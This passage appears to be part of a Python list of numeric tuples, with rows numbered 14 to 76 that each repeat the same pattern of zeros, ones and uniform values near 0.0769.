(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 14
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 15
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 16
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 17
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 18
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 19
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 20
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 21
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 22
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 23
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 24
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 25
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 26
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 27
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 28
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 29
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 30
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 31
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 32
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 33
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 34
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 35
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 36
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 37
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 38
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 39
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 40
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 41
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 42
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 43
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 44
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 45
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 46
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 47
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 48
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 49
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 50
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 51
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 52
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 53
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 54
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 55
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 56
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 57
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 58
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 59
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 60
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 61
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 62
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 63
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 64
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 65
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 66
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 67
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 68
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 69
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 70
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 71
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 72
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 73
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 74
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 75
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 76
